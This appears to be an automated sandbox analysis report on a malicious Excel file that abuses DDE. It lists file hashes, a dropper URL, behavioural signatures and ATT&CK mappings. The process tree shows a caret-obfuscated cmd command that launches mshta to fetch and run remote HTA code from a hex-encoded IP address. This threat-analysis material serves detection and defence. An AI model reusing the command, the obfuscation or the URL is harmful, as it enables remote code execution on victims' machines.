Analysis

  • max time kernel
    119s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    28-01-2022 01:47

General

  • Target

    file-1000.xls

  • Size

    65KB

  • MD5

    087d0c52c0d79745dba60bda6595f200

  • SHA1

    f07fd36c0d40cc3c005f2762aa707d0217e40e88

  • SHA256

    139aec84aa529d034a2299210fc8d8c23d2188300e5851f48e909d4813c371df

  • SHA512

    eae402debf0119d30e476fc3b3d50e92cb30fdf1fc36199730f44f382eb2d2b63bf8fd0954925de605be841ccc761e229101d9701115f55af0733a0347bc32f5

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0xc12a24f5/cc.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\file-1000.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1324
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0xc12a24f5/cc.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:852
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://0xc12a24f5/cc.html
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        PID:1108

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1324-55-0x000000002F221000-0x000000002F224000-memory.dmp
    Filesize

    12KB

  • memory/1324-56-0x0000000071031000-0x0000000071033000-memory.dmp
    Filesize

    8KB

  • memory/1324-57-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1324-58-0x0000000075021000-0x0000000075023000-memory.dmp
    Filesize

    8KB

  • memory/1324-60-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB